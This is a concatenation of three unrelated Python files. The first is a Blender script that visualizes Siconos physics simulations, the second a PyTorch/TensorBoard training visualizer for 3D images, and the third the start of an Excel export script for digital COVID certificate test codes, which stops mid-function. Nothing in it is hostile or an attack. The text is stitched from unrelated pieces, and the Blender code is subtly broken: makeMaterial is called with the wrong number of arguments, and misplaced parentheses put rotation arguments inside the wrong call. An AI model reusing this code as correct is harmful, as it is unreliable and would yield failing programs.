|
<gh_stars>0
#! /usr/bin/env python3
# Blender scripts
#author <NAME>
#copyright 2016-2017 INRIA. Licensed under the Apache License, Version 2.0.
#(see @ref LICENSE or http://www.apache.org/licenses/LICENSE-2.0)
#needs blender. run it from the command line: blender --python siconosv.py
#to debug without blender: blender --background --python siconosv.py
#framerate given to the function should correspond to the timestep of the simulation
import bpy
import shlex
import mathutils
import sys
import numpy
import time
import math
import random
bl_info = {
"name": "Siconos Visualization",
"author": "<NAME>",
"version": (1, 0),
"blender": (2, 6, 3),
"description": "Visualizes scenes from Siconos simulations",
"warning": "May contain bugs!",
"wiki_url": "",
"tracker_url": "",
"category": "Animation"
}
#main simulation class
#1)in the future for visualizing contact forces I'll make a switch in the inject keyframes function
#2)ways to handle compound shapes in blender
#3)ways to handle mesh shapes in blender
class Simulation(object):
def __init__(self, shape_filename='ref.txt', input_filename='input.dat', bind_filename='bindings.dat', dpos_filename='dpos.dat', spos_filename='spos.dat'):
self.shape_filename_ = shape_filename
self.input_filename_ = input_filename
self.bind_filename_ = bind_filename
self.dpos_filename_ = dpos_filename
self.spos_filename_ = spos_filename
#symbols recognizable by the parser
self.symbols_ = ['Cone', 'Sphere', 'Box', 'Plane', 'Cylinder', 'Pyramid', 'Capsule']
#dictionary for holding number of instances of each primitive
self.instance_counters_ = dict()
#dictionary holding moving objects on the scene - 'name_of_the_object':array_with_animation_data
self.movables_ = dict()
#dictionary holding the bindings from the bindings.dat file
self.bindings_ = dict()
def strToVect(self, st):
tmp = st.split(' ')
vec = []
for num in tmp:
num = float(num)
vec.append(num)
return vec
def applyTransform(self, position, quaternion):
ob = bpy.context.object
ob.rotation_mode = 'QUATERNION'
ob.rotation_quaternion = quaternion
ob.location = position
return ob
def quatToEul(self, quaternion):
q = mathutils.Quaternion(quaternion)
e = q.to_euler()
eul = [e.x, e.y, e.z]
return numpy.array(eul)
def makeMaterial(self, name, diffuse, alpha):
mat = bpy.data.materials.new(name)
mat.diffuse_color = diffuse
mat.diffuse_shader = 'LAMBERT'
mat.diffuse_intensity = 1.0
mat.specular_intensity = 0.5
mat.alpha = alpha
mat.ambient = 1
return mat
def setMaterial(self, ob, mat):
me = ob.data
me.materials.append(mat)
def assignMaterials(self, di):
#di is a dictionary with id:rgb pairs
mat = {}
for i in di.keys():
#making materials
tmp = self.makeMaterial('mat' + str(i), di[i], (1,1,0), 0)
mat[i] = tmp
for ob in bpy.data.objects:
l = ob.name.split("_")
#if the object's name is of the form "object_num_num" then the material's assignment will execute
if len(l) > 1:
self.setMaterial(ob, mat[int(l[1])])
else:
continue
return
def createForceArrow(self, x, y, z, n, lbd = 0):
"""Creates an arrow from a given point along a given vector
x,y,z is point to go from, n is a noral vector, and lbd is a scaling factor"""
v = mathutils.Vector((x,y,z))
up = mathutils.Vector((n[0],n[1],n[2]))
rotation_quat = up.to_track_quat('Z', 'Y')
my_Cylinder = bpy.ops.mesh.primitive_cylinder_add(vertices=16, radius=0.01, depth=lbd)
ob1 = bpy.context.object
ob1.name = 'my_Cylinder'
bpy.ops.transform.translate(value=(0,0,(lbd/2+v.length)))
my_Cone = bpy.ops.mesh.primitive_cone_add(vertices=40, radius1=0.1, radius2=0, depth=0.5, location=(0, 0, 0), rotation=(0, 0, 0))
ob2 = bpy.context.object
ob2.name = 'my_Cone'
bpy.ops.transform.translate(value=(0,0,(lbd+v.length)))
ob1.select = True
ob2.select = True
bpy.ops.object.join()
#change location of tooltip to the bottom of the arrow
newLoc = mathutils.Vector((0, 0, v.length))
bpy.context.scene.cursor_location = newLoc
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
ob = bpy.context.object
myName = 'Arrow'
col = mathutils.Color((random.random(), random.random(), random.random()))
ob.name = myName
ob.show_name = True
me = ob.data
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
ob.rotation_mode = 'QUATERNION'
ob.rotation_quaternion = rotation_quat
ob.location = v
return ob
def createContactCone(self, x, y, z, mu):
"""Creates an inversed cone with the top placed at a given point, mu is a
friction coeff"""
#create an inversed cone at the specified point
pos = mathutils.Vector((x,y,z))
eul = mathutils.Euler((0.0, math.radians(180.0), 0.0), 'XYZ')
myName = 'Cone'
my_Cone = bpy.ops.mesh.primitive_cone_add(vertices=40, radius1=mu, radius2=0, depth=1, location=pos, rotation=eul)
bpy.ops.transform.translate(value=(0,0,0.5))
ob = bpy.context.object
#shift the tooltip to the bottom of the cone
bpy.context.scene.cursor_location = pos
bpy.ops.object.origin_set(type='ORIGIN_CURSOR')
#give a random color to the cone
col = mathutils.Color((random.random(), random.random(), random.random()))
ob.name = myName
ob.show_name = True
me = ob.data
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
me.name = myName + '_' + 'Mesh'
return ob
def makePyramid(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myName = 'Pyramid' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Pyramid = bpy.ops.mesh.primitive_cone_add(vertices=4, radius1=params[0], radius2=0, depth=params[1], location=self.strToVect(' '.join(li[6:9]), rotation=self.quatToEul(self.strToVect(' '.join(li[9:13])))))
ob = bpy.context.object
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeCone(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myName = 'Cone' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Cone = bpy.ops.mesh.primitive_cone_add(vertices=40, radius1=params[0], radius2=0, depth=params[1], location=self.strToVect(' '.join(li[6:9]), rotation=self.quatToEul(self.strToVect(' '.join(li[9:13])))))
ob = bpy.context.object
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeBox(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:4]))
#divide by two to scale corectly
params = [i/2 for i in params]
myName = 'Box' + '_' + str(li[4])
#if object is dynamic create an entry in the movables dictionary
if int(li[4]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Box = bpy.ops.mesh.primitive_cube_add(location=self.strToVect(' '.join(li[7:10])), rotation=self.quatToEul(self.strToVect(' '.join(li[10:14]))))
ob = bpy.context.object
ob.scale=(params)
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeSphere(self, li):
#object geometric parameters
params = self.strToVect(''.join(li[1]))
myName = 'Sphere' + '_' + str(li[2])
#if object is dynamic create an entry in the movables dictionary
if int(li[2]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Sphere = bpy.ops.mesh.primitive_uv_sphere_add(size=params[0], location=self.strToVect(' '.join(li[5:8])))
ob = bpy.context.object
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeCylinder(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myName = 'Cylinder' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myName] = numpy.empty(0)
rot = self.quatToEul(self.strToVect(' '.join(li[9:13])))
#we rotate the cylinder to make it along the y-axis as in bullet
eul = mathutils.Euler(rot)
eul.rotate_axis('Y', math.radians(90))
my_Cylinder = bpy.ops.mesh.primitive_cylinder_add(radius=params[0], depth=params[1], location=self.strToVect(' '.join(li[6:9])), rotation=eul)
ob = bpy.context.object
#below line to put the applied roatation into effect
bpy.ops.object.transform_apply(rotation = True)
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeCapsule(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:3]))
myFinalName = 'Capsule' + '_' + str(li[3])
#if object is dynamic create an entry in the movables dictionary
if int(li[3]) > 0:
self.movables_[myFinalName] = numpy.empty(0)
rot = self.quatToEul(self.strToVect(' '.join(li[9:13])))
loc = self.strToVect(' '.join(li[6:9]))
rad = params[0]
height = params[1]
#we create a capsule shape from a cylinder and two spheres
my_Sphere1 = bpy.ops.mesh.primitive_uv_sphere_add(size=rad, location=(0,0,height/2), rotation=(0,0,0))
ob1 = bpy.context.object
ob1.name = 'my_Sphere1'
my_Sphere2 = bpy.ops.mesh.primitive_uv_sphere_add(size=rad, location=(0,0,-height/2), rotation=(0,0,0))
ob2 = bpy.context.object
ob2.name = 'my_Sphere2'
my_Cylinder = bpy.ops.mesh.primitive_cylinder_add(radius=rad, depth=height, location=(0,0,0), rotation=(0,0,0))
ob3 = bpy.context.object
ob3.name = 'my_Cylinder'
ob1.select = True
ob2.select = True
ob3.select = True
bpy.ops.object.join()
ob = bpy.context.object
#we rotate the capsule to make it along the y-axis as in bullet
eul = mathutils.Euler(rot)
eul.rotate_axis('Y', math.radians(90))
ob.rotation_euler = eul
#below line to put the applied roatation into effect
bpy.ops.object.transform_apply(rotation = True)
ob.name = myFinalName
ob.show_name = True
me = ob.data
me.name = myFinalName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makePlane(self, li):
#object geometric parameters
params = self.strToVect(' '.join(li[1:4]))
#divide by two to scale corectly
params = [i/2 for i in params]
myName = 'Plane' + '_' + str(li[4])
#if object is dynamic create an entry in the movables dictionary
if int(li[4]) > 0:
self.movables_[myName] = numpy.empty(0)
my_Plane = bpy.ops.mesh.primitive_plane_add(location=self.strToVect(' '.join(li[7:10])), rotation=self.quatToEul(self.strToVect(' '.join(li[10:14]))))
ob = bpy.context.object
ob.scale=(params)
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def makeStlMesh(self, li):
"""Function to read an .stl mesh from the file and instantiate it on the scene"""
myName = 'My_Mesh' + '_' + str(li[1])
#if object is dynamic create an entry in the movables dictionary
if int(li[1]) > 0:
self.movables_[myName] = numpy.empty(0)
my_mesh = bpy.ops.import_mesh.stl(filepath=li[0])
ob = bpy.context.selected_objects[0]
ob.location = self.strToVect(' '.join(li[4:7]))
ob.rotation_euler = self.quatToEul(self.strToVect(' '.join(li[7:11])))
ob.name = myName
ob.show_name = True
me = ob.data
me.name = myName + '_' + 'Mesh'
#assign a random color to the primitive
col = mathutils.Color((random.random(), random.random(), random.random()))
mat = self.makeMaterial('random color' + str(random.random()), col, 1)
self.setMaterial(ob, mat)
return ob
def prepareInput(self):
"""Prepares input to drawScene function (reads from ref.txt and input.dat).
Returns a list of strings read by the drawScene() function.
This function also fills the dictionary from the bindings.dat file"""
# get the bindings of the objects
with open(self.bind_filename_, 'r') as bind_file:
bind_lines = bind_file.readlines()
for bind_line in bind_lines:
lex = shlex.split(bind_line)
self.bindings_[int(lex[0])] = [int(lex[1])]
# dictionary with pairs : position in the file (line number) - primitive specification
shapes = dict()
# function's output - a list with strings which are inputs to the drawScene() function
drawScene_input = list()
with open(self.input_filename_, 'r') as finput, open(self.shape_filename_, 'r') as fshapes:
shape_lines = fshapes.readlines()
for idx, shape_line in enumerate(shape_lines):
shapes[idx] = shape_line.replace("\n", "")
self.instance_counters_[shapes[idx].split()[0]] = 0
input_lines = finput.readlines()
for idx, input_line in enumerate(input_lines):
lex = shlex.split(input_line)
if int(lex[1]) < 0:
newLine = shapes[int(lex[0])] + ' ' + str(lex[1]) + ' ' + ' '.join(lex[1:])
else:
newLine = shapes[int(lex[0])] + ' ' + str(lex[1]) + ' ' + ' '.join(lex[1:])
drawScene_input.append(newLine)
return drawScene_input
def drawScene(self):
"""Visualizes the initial scene state - places objects from the list returned by prepareInput()
in their initial state. Returns a scene with objects placed at their initial positions and
with their attributes"""
scn = bpy.context.scene
bpy.ops.object.select_by_type(type='MESH')
bpy.ops.object.delete()
lines = self.prepareInput()
spos = numpy.loadtxt(self.spos_filename_)
#slicing of spos to get the id's vector (handling the 1D case of spos)
if spos.ndim == 1:
spos_id_slice = numpy.array([spos[1]])
else:
spos_id_slice = spos[:, 1]
for line in lines:
lex = shlex.split(line)
symbol = lex[0]
if symbol in self.symbols_:
#instantiation of objects
if symbol == 'Box':
self.instance_counters_[symbol] += 1
self.makeBox(lex)
if numpy.where(spos_id_slice == float(lex[5]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[5]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[5]))][0, 5:])
elif symbol == 'Sphere':
self.instance_counters_[symbol] += 1
self.makeSphere(lex)
if numpy.where(spos_id_slice == float(lex[3]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[3]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[3]))][0, 5:])
elif symbol == 'Cylinder':
self.instance_counters_[symbol] += 1
self.makeCylinder(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif symbol == 'Plane':
self.instance_counters_[symbol] += 1
self.makePlane(lex)
if numpy.where(spos_id_slice == float(lex[5]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[5]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[5]))][0, 5:])
elif symbol == 'Cone':
self.instance_counters_[symbol] += 1
self.makeCone(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif symbol == 'Pyramid':
self.instance_counters_[symbol] += 1
self.makePyramid(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif symbol == 'Capsule':
self.instance_counters_[symbol] += 1
self.makeCapsule(lex)
if numpy.where(spos_id_slice == float(lex[4]))[0].size != 0:
if spos.ndim == 1:
self.applyTransform(spos[2:5], spos[5:])
else:
self.applyTransform(spos[numpy.where(spos_id_slice == float(lex[4]))][0, 2:5], spos[numpy.where(spos_id_slice == float(lex[4]))][0, 5:])
elif '.stl' in symbol:
self.instance_counters_[symbol] += 1
self.makeStlMesh(lex)
bpy.ops.object.select_all()
return scn
def injectKeyframes(self):
"""Injects keyframes in dynamic objects on the scene (reads from dpos.dat)"""
#calculating the framerate (assuming 24 fps)
#simTime and timeStep are in seconds
#if my simulation lasts 10 sec then when using 24 fps i need
#240 frames for the whole simulation.
#if the simulation lasts 10 sec with a timestep of 0.005 s
#then I have 2000 steps in the simulation.
#to get my framerate i need to divide the total number of frames
#per total number of timesteps.
scn = bpy.context.scene
#time evolution loading
dpos = numpy.loadtxt(self.dpos_filename_, ndmin=2)
#calculating simTime and timeStep
simTime = dpos[:, 0][dpos[:, 0].size - 1]
timeStep = dpos[:, 0][numpy.where(dpos[:, 0] == 0)[0].size + 1] - dpos[:, 0][0]
frameRate = (24*simTime)/(simTime/timeStep)
#getting and preparing the scene
frame_num = 0
frame_total = simTime*24
bpy.context.scene.frame_start = frame_num
bpy.context.scene.frame_end = frame_total
#picking lines corresponding to respective id's
#appending numpy arrays to the dictionary
for key in self.movables_.keys():
idx = int(key.split("_")[1])
self.movables_[key] = dpos[numpy.where(dpos[:,1] == idx)]
#Creation of actions for objects
objects = self.movables_.keys()
for obj in bpy.data.objects:
obj.rotation_mode = 'QUATERNION'
if obj.name in objects:
obj.animation_data_create()
obj.animation_data.action = bpy.data.actions.new(name="MyAction")
fcu_x = obj.animation_data.action.fcurves.new(data_path="location", index=0)
fcu_y = obj.animation_data.action.fcurves.new(data_path="location", index=1)
fcu_z = obj.animation_data.action.fcurves.new(data_path="location", index=2)
fcu_rot0 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=0)
fcu_rot1 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=1)
fcu_rot2 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=2)
fcu_rot3 = obj.animation_data.action.fcurves.new(data_path="rotation_quaternion", index=3)
fcu_x.keyframe_points.add(len(self.movables_[obj.name]))
fcu_y.keyframe_points.add(len(self.movables_[obj.name]))
fcu_z.keyframe_points.add(len(self.movables_[obj.name]))
fcu_rot0.keyframe_points.add(len(self.movables_[obj.name]))
fcu_rot1.keyframe_points.add(len(self.movables_[obj.name]))
fcu_rot2.keyframe_points.add(len(self.movables_[obj.name]))
fcu_rot3.keyframe_points.add(len(self.movables_[obj.name]))
for i in range(0, len(self.movables_[obj.name])):
fcu_x.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][2]
fcu_y.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][3]
fcu_z.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][4]
fcu_rot0.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][5]
fcu_rot1.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][6]
fcu_rot2.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][7]
fcu_rot3.keyframe_points[i].co = i*frameRate, self.movables_[obj.name][i][8]
#turning back frames to the beginning
frame_num = 0
bpy.context.scene.frame_set(frame_num)
#returning the scene
return scn
def runScene(self):
bpy.ops.screen.animation_play()
if __name__ == "__main__":
sim = Simulation()
sim.drawScene()
sim.injectKeyframes()
|
# TODO Sep 08 version
import numpy as np
import os
import sys
import ntpath
import time
from . import util, html
from subprocess import Popen, PIPE
from PIL import Image
import torchvision
import datetime
import matplotlib.pyplot as plt
# plt.switch_backend('agg')
from mpl_toolkits.mplot3d import Axes3D
# import matplotlib.gridspec as gridspec
from collections import OrderedDict
from matplotlib import cm
from tifffile import imsave
import torch
def save_images(webpage, visuals, image_path, aspect_ratio=1.0, width=256):
"""Save images to the disk,
Parameters:
webpage (the HTML class) -- the HTML webpage class that stores these images (see html.py for more details)
visuals (OrderedDict) -- an ordered dictionary that stores (name, images (either tensor or numpy) ) pairs
image_path (str) -- the string is used to create image paths
aspect_ratio (float) -- the aspect ratio of saved images
width (int) -- the images will be resized to width x width
This function will save images stored in 'visuals' to the HTML file specified by 'webpage'.
"""
image_dir = webpage.get_image_dir()
short_path = ntpath.basename(image_path[0])
name = os.path.splitext(short_path)[0]
# name = image_path
webpage.add_header(name)
ims, txts, links = [], [], []
for label, im_data in visuals.items():
image_numpy = util.tensor2im(im_data)
# Need to subtract background to reduce the across-patch background intensity difference.
label_image_dir = image_dir+'/'+label+'/'
if not os.path.exists(label_image_dir):
os.makedirs(label_image_dir)
image_name = '%s_%s.png' % (name, label)
save_path = os.path.join(label_image_dir, image_name)
image_numpy = image_numpy.squeeze()
util.save_image(image_numpy, save_path, aspect_ratio=aspect_ratio)
ims.append(save_path)
txts.append(label)
links.append(save_path)
# TODO: Fix it so that the webpage correctly displays both images.
webpage.add_images(ims, txts, links, width=width)
def save_test_metrics(save_dir, opt, ssims, psnrs):
ssim_avg_input_gt = ssims[0]
ssim_avg_output_gt = ssims[1]
ssim_whole_input_gt = ssims[2]
ssim_whole_output_gt = ssims[3]
psnr_avg_input_gt = psnrs[0]
psnr_avg_output_gt = psnrs[1]
psnr_avg_whole_input_gt = psnrs[2]
psnr_avg_whole_output_gt = psnrs[3]
message = 'Experiment Name: ' + opt.name + '\n'
message += '-------------------------------------------------\n'
message += 'Network Input vs. Groundtruth\n'
message += '(ssim_avg: %.4f, psnr_avg: %.4f, ssim_whole: %.4f, psnr_whole: %.4f)\n' % (ssim_avg_input_gt, psnr_avg_input_gt, ssim_whole_input_gt, psnr_avg_whole_input_gt)
message += '-------------------------------------------------\n'
message += 'Network Output vs. Groundtruth\n'
message += '(ssim_avg: %.4f, psnr_avg: %.4f, ssim_whole: %.4f, psnr_whole: %.4f)\n' % (ssim_avg_output_gt, psnr_avg_output_gt, ssim_whole_output_gt, psnr_avg_whole_output_gt)
message += '-------------------------------------------------'
print(message) # print the message
filename = os.path.join(save_dir, 'metrics.txt')
with open(filename, "a") as metric_file:
metric_file.write('%s\n' % message) # save the message
import numpy as np
class Visualizer():
def __init__(self, opt):
self.opt = opt
self.win_size = opt.display_winsize
self.use_html = opt.isTrain and not opt.no_html
self.name = opt.name
self.port = opt.display_port
self.display_histogram = opt.display_histogram
self.saved = False
if self.use_html: # create an HTML object at <checkpoints_dir>/web/; images will be saved under <checkpoints_dir>/web/images/
self.web_dir = os.path.join(opt.checkpoints_dir, opt.name, 'web')
self.img_dir = os.path.join(self.web_dir, 'images')
print('create web directory %s...' % self.web_dir)
util.mkdirs([self.web_dir, self.img_dir])
self.tb_dir = os.path.join(opt.checkpoints_dir, 'tensorboard')
print('create tensorboard directory %s...' % self.tb_dir)
util.mkdir(self.tb_dir)
from torch.utils.tensorboard import SummaryWriter
#TODO: log differently by time.
self.log_dir = os.path.join(self.tb_dir, self.name)
self.tb_writer = SummaryWriter(self.log_dir)
# create a logging file to store training losses
self.log_name = os.path.join(opt.checkpoints_dir, opt.name, 'loss_log.txt')
with open(self.log_name, "a") as log_file:
now = time.strftime("%c")
log_file.write('================ Training Loss (%s) ================\n' % now)
def reset(self):
"""Reset the self.saved status."""
self.saved = False
# def display_current_model(self, model):
# self.tb_writer.add(graph)
def display_current_results(self, visuals, epoch):
"""
Display current results on tensorboard.
Parameters:
visuals (OrderedDict) -- dictionary of images to display or save.
epoch (int) -- the current epoch
"""
for label, image in visuals.items():
if self.opt.model != 'classifier':
img_np = util.tensor2im(image, imtype=np.uint8)
img_shape = img_np.shape
b, c, d, h, w = img_shape
slice_portion = int(d/2) # For 3D images, get three images at increasing depth
img_sample = img_np[0, 0, slice_portion, :,:] # choose the first sample in the batch
img_sample2 = img_np[0, 0, :, slice_portion, :] # choose the second sample in the batch
img_sample3 = img_np[0, 0, :, :, slice_portion] # choose the third sample in the batch
fig_slice = plt.figure(edgecolor='b', dpi=150)
ax = fig_slice.add_subplot(1, 3, 1)
ax2 = fig_slice.add_subplot(1, 3, 2)
ax3 = fig_slice.add_subplot(1, 3, 3)
ax.set_axis_off()
ax2.set_axis_off()
ax3.set_axis_off()
ax.set_title('XY slice')
ax2.set_title('XZ slice')
ax3.set_title('YZ slice')
ax.imshow(img_sample, cmap='gray')
ax2.imshow(img_sample2, cmap='gray')
ax3.imshow(img_sample3, cmap='gray')
plt.gca().set_axis_off()
plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
hspace=0, wspace=0)
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.close(fig_slice)
img_mip_xy = np.amax(img_np[0,0], 0)
img_mip_xz = np.amax(img_np[0,0], 1)
img_mip_yz = np.amax(img_np[0,0], 2)
fig_mip = plt.figure(edgecolor='b', dpi=150)
ax_2_1 = fig_mip.add_subplot(1, 3, 1)
ax_2_2= fig_mip.add_subplot(1, 3, 2)
ax_2_3 = fig_mip.add_subplot(1, 3, 3)
ax_2_1.set_axis_off()
ax_2_2.set_axis_off()
ax_2_3.set_axis_off()
ax_2_1.set_title('XY MIP')
ax_2_2.set_title('XZ MIP')
ax_2_3.set_title('YZ MIP')
ax_2_1.imshow(img_mip_xy, vmax=256, cmap='gray')
ax_2_2.imshow(img_mip_xz, vmax=256,cmap='gray')
ax_2_3.imshow(img_mip_yz, vmax=256, cmap='gray')
plt.gca().set_axis_off()
plt.subplots_adjust(top=1, bottom=0, right=1, left=0,
hspace=0, wspace=0)
plt.margins(0, 0)
plt.gca().xaxis.set_major_locator(plt.NullLocator())
plt.gca().yaxis.set_major_locator(plt.NullLocator())
plt.close(fig_mip)
self.tb_writer.add_figure('train_slice_images/' + label, fig_slice, epoch)
self.tb_writer.add_figure('train_mip_images/' + label, fig_mip, epoch)
else: # if the model is a classifier, display with the labels.
if label == 'output_tr_softmax' or label == 'output_val_softmax' or label =='label_GT':
#image[0] chooses the first item in the batch.
predicted = torch.argmax(image[0])
label_print = predicted.cpu().float().numpy()
if label_print == 0:
label_print_str = 'Axial'
elif label_print == 1:
label_print_str = 'Lateral'
fig_slice = plt.figure()
plt.text(0.1, 0.4, label_print_str, size=60, bbox=dict(boxstyle="square",
ec=(1., 0.5, 0.5),
fc=(1., 0.8, 0.8),
))
plt.show()
plt.close(fig_slice)
self.tb_writer.add_figure('train_images/' + label, fig_slice, epoch)
else:
img_np = util.tensor2im(image[0], imtype=np.uint8)
img_np = img_np.squeeze()
fig_slice = plt.figure()
plt.imshow(img_np, cmap='gray')
plt.close(fig_slice)
self.tb_writer.add_figure('train_images/' + label, fig_slice, epoch)
def display_model_hyperparameters(self): # note that in tensorboard, it is shown as markdowns.
message = '--------------- Options ------------------ \n'
for k, v in sorted(vars(self.opt).items()):
comment = ''
message += '**{:>1}**: {:>10}{} \n'.format(str(k), str(v), comment)
message += '----------------- End -------------------'
self.tb_writer.add_text('Model_hyperparameters', message)
def display_current_histogram(self, visuals, epoch):
for label, image in visuals.items():
if self.display_histogram:
self.tb_writer.add_histogram('train_histograms/' + label, image[0][0], epoch)
def display_graph(self, model, visuals):
for label, image in visuals.items():
self.tb_writer.add_graph(model, image)
def save_current_visuals(self, visuals, epoch):
for label, image in visuals.items():
img_np = util.tensor2im(image[0], imtype=np.uint8)
file_name = os.path.join(self.img_dir, str(epoch) + '_' + str(label)+'.tif')
imsave(file_name, img_np)
def plot_current_losses(self, plot_count, losses, is_epoch=False):
"""display the current losses on tensorboard display: dictionary of error labels and values
Parameters:
plot_count (int) -- iteration count (default) or epoch count
losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
"""
for label, loss in losses.items():
if is_epoch:
self.tb_writer.add_scalar('train_by_epoch/' + label, loss, plot_count)
else:
self.tb_writer.add_scalar('train_by_epoch_progress/' + label, loss, plot_count)
def print_current_losses(self, epoch, epoch_progress, losses, t_comp, t_data):
"""print current losses on console; also save the losses to the disk
Parameters:
epoch (int) -- current epoch
epoch_progress (int) -- current training progress in this epoch in percent (reset to 0 at the end of every epoch)
losses (OrderedDict) -- training losses stored in the format of (name, float) pairs
t_comp (float) -- computational time per data point (normalized by batch_size)
t_data (float) -- data loading time per data point (normalized by batch_size)
"""
message = '(epoch: %d, epoch_progress: %d%%, iter time: %.3f, data load time: %.3f) ' % (epoch, epoch_progress, t_comp, t_data)
for k, v in losses.items():
message += '%s: %.3f ' % (k, v)
print(message) # print the message
with open(self.log_name, "a") as log_file:
log_file.write('%s\n' % message) # save the message |
<filename>tests/excel_export.py<gh_stars>10-100
import os
import json
import logging
import openpyxl
from glob import glob
from pathlib import Path
from argparse import ArgumentParser
config = {
# Can be overridden by placing a config.json file in the directory
"base_url" : "https://github.com/eu-digital-green-certificates/dcc-quality-assurance/blob/main/",
"column_titles" : ["Issuing Country", "Schema Version", "Certificate Type", "Validation Status", "Code URL", "Filename"],
"column_value_ids" : ["country", "version", "type", None, "url", "file" ],
"sheet" : "Codes",
"__countryfile-doc__" : "Following section can be omitted when not using country files feature",
"countryfile-participants" : ["AT", "BE", "BG", "CH", "CY", "CZ", "DE", "DK", "EE", "EL", "ES", "FI", "FR", "HR", "HU", "IE", "IS", "IT", "LI", "LT", "LU", "LV", "MT", "NL", "NO", "PL", "PT", "RO", "SE", "SI", "SK", "SM", "VA"],
"countryfile-sheet" : "Validation Results", "countryfile-startrow" : 4,
"countryfile-ccc" : "G2",
"countryfile-constants" : {
"H2" : "Validation Cycle #",
"J2" : "Validation Period Text"
}
}
def main(args):
workbook = _get_or_create_xlsx(args.filename, config['sheet'])
workbook[config['sheet']].delete_rows(2, amount=1000)
file_entry_handlers = [] # List of objects that handle matching files
file_entry_handlers.append(lambda entry : _append_row( workbook[config['sheet']], entry ) )
if args.country_template is not None:
try:
countryFileGenerator = CountryFileGenerator(args.country_template)
file_entry_handlers.append( lambda entry: countryFileGenerator.addEntry(entry) )
except:
logging.error('Country file template was given but could not be loaded')
raise
return -1
# Main loop: Find all matches and pass them to all handlers
for directory in _get_country_directories():
for match in _matching_files(directory):
for handle in file_entry_handlers:
handle(match)
logging.info(f"Saving {args.filename}")
workbook.save(args.filename)
if args.country_template is not None:
